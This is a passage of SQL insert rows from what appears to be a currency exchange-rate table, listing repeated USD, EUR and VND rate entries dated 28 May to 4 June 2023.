(4537, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4538, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4539, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4540, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4541, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4542, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4543, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4544, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4545, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4546, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4547, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4548, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4549, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4550, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4551, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4552, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4553, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4554, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4555, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4556, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4557, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4558, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4559, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4560, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4561, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-28'),
(4562, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4563, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-28'),
(4564, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-28'),
(4565, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-28'),
(4566, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-28'),
(4567, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4568, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4569, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4570, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4571, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4572, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4573, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4574, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4575, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4576, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4577, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4578, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4579, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4580, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4581, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4582, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4583, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4584, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4585, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4586, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4587, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4588, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4589, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4590, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4591, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4592, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4593, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4594, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4595, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4596, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4597, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4598, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4599, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4600, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4601, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4602, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4603, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4604, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4605, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4606, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4607, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4608, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4609, 1, 'USD', 0.000000, 2, 'EUR', 0.930150, '2023-05-29'),
(4610, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4611, 2, 'EUR', 0.000000, 1, 'USD', 1.075100, '2023-05-29'),
(4612, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-29'),
(4613, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-29'),
(4614, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-29'),
(4615, 1, 'USD', 1.000000, 2, 'EUR', 0.930150, '2023-05-30'),
(4616, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4617, 2, 'EUR', 1.000000, 1, 'USD', 1.075100, '2023-05-30'),
(4618, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4619, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4620, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4621, 1, 'USD', 0.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4622, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4623, 2, 'EUR', 0.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4624, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4625, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4626, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4627, 1, 'USD', 1.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4628, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4629, 2, 'EUR', 1.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4630, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4631, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4632, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4633, 1, 'USD', 0.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4634, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4635, 2, 'EUR', 0.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4636, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4637, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4638, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4639, 1, 'USD', 1.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4640, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4641, 2, 'EUR', 1.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4642, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4643, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4644, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4645, 1, 'USD', 0.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4646, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4647, 2, 'EUR', 0.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4648, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4649, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4650, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4651, 1, 'USD', 1.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4652, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4653, 2, 'EUR', 1.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4654, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4655, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4656, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4657, 1, 'USD', 0.000000, 2, 'EUR', 0.933270, '2023-05-30'),
(4658, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4659, 2, 'EUR', 0.000000, 1, 'USD', 1.071500, '2023-05-30'),
(4660, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-30'),
(4661, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-30'),
(4662, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-30'),
(4663, 1, 'USD', 1.000000, 2, 'EUR', 0.933270, '2023-05-31'),
(4664, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4665, 2, 'EUR', 1.000000, 1, 'USD', 1.071500, '2023-05-31'),
(4666, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4667, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4668, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4669, 1, 'USD', 0.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4670, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4671, 2, 'EUR', 0.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4672, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4673, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4674, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4675, 1, 'USD', 1.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4676, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4677, 2, 'EUR', 1.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4678, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4679, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4680, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4681, 1, 'USD', 0.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4682, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4683, 2, 'EUR', 0.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4684, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4685, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4686, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4687, 1, 'USD', 1.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4688, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4689, 2, 'EUR', 1.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4690, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4691, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4692, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4693, 1, 'USD', 0.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4694, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4695, 2, 'EUR', 0.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4696, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4697, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4698, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4699, 1, 'USD', 1.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4700, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4701, 2, 'EUR', 1.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4702, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4703, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4704, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4705, 1, 'USD', 0.000000, 2, 'EUR', 0.930750, '2023-05-31'),
(4706, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4707, 2, 'EUR', 0.000000, 1, 'USD', 1.074400, '2023-05-31'),
(4708, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-05-31'),
(4709, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-05-31'),
(4710, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-05-31'),
(4711, 1, 'USD', 1.000000, 2, 'EUR', 0.930750, '2023-06-01'),
(4712, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4713, 2, 'EUR', 1.000000, 1, 'USD', 1.074400, '2023-06-01'),
(4714, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4715, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4716, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4717, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4718, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4719, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4720, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4721, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4722, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4723, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4724, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4725, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4726, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4727, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4728, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4729, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4730, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4731, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4732, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4733, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4734, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4735, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4736, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4737, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4738, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4739, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4740, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4741, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4742, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4743, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4744, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4745, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4746, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4747, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4748, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4749, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4750, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4751, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4752, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4753, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-01'),
(4754, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4755, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-01'),
(4756, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-01'),
(4757, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-01'),
(4758, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-01'),
(4759, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-02'),
(4760, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4761, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-02'),
(4762, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4763, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4764, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4765, 1, 'USD', 0.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4766, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4767, 2, 'EUR', 0.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4768, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4769, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4770, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4771, 1, 'USD', 1.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4772, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4773, 2, 'EUR', 1.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4774, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4775, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4776, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4777, 1, 'USD', 0.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4778, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4779, 2, 'EUR', 0.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4780, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4781, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4782, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4783, 1, 'USD', 1.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4784, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4785, 2, 'EUR', 1.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4786, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4787, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4788, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4789, 1, 'USD', 0.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4790, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4791, 2, 'EUR', 0.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4792, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4793, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4794, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4795, 1, 'USD', 1.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4796, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4797, 2, 'EUR', 1.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4798, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4799, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4800, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4801, 1, 'USD', 0.000000, 2, 'EUR', 0.934840, '2023-06-02'),
(4802, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4803, 2, 'EUR', 0.000000, 1, 'USD', 1.069700, '2023-06-02'),
(4804, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-02'),
(4805, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-02'),
(4806, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-02'),
(4807, 1, 'USD', 1.000000, 2, 'EUR', 0.934840, '2023-06-03'),
(4808, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4809, 2, 'EUR', 1.000000, 1, 'USD', 1.069700, '2023-06-03'),
(4810, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4811, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4812, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4813, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4814, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4815, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4816, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4817, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4818, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4819, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4820, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4821, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4822, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4823, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4824, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4825, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4826, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4827, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4828, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4829, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4830, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4831, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4832, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4833, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4834, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4835, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4836, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4837, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4838, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4839, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4840, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4841, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4842, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4843, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4844, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4845, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4846, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4847, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4848, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4849, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-03'),
(4850, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4851, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-03'),
(4852, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-03'),
(4853, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-03'),
(4854, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-03'),
(4855, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4856, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4857, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4858, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4859, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4860, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4861, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4862, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4863, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4864, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4865, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4866, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4867, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4868, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4869, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4870, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4871, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4872, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4873, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4874, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4875, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4876, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4877, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4878, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4879, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4880, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4881, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4882, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4883, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4884, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4885, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4886, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4887, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-04'),
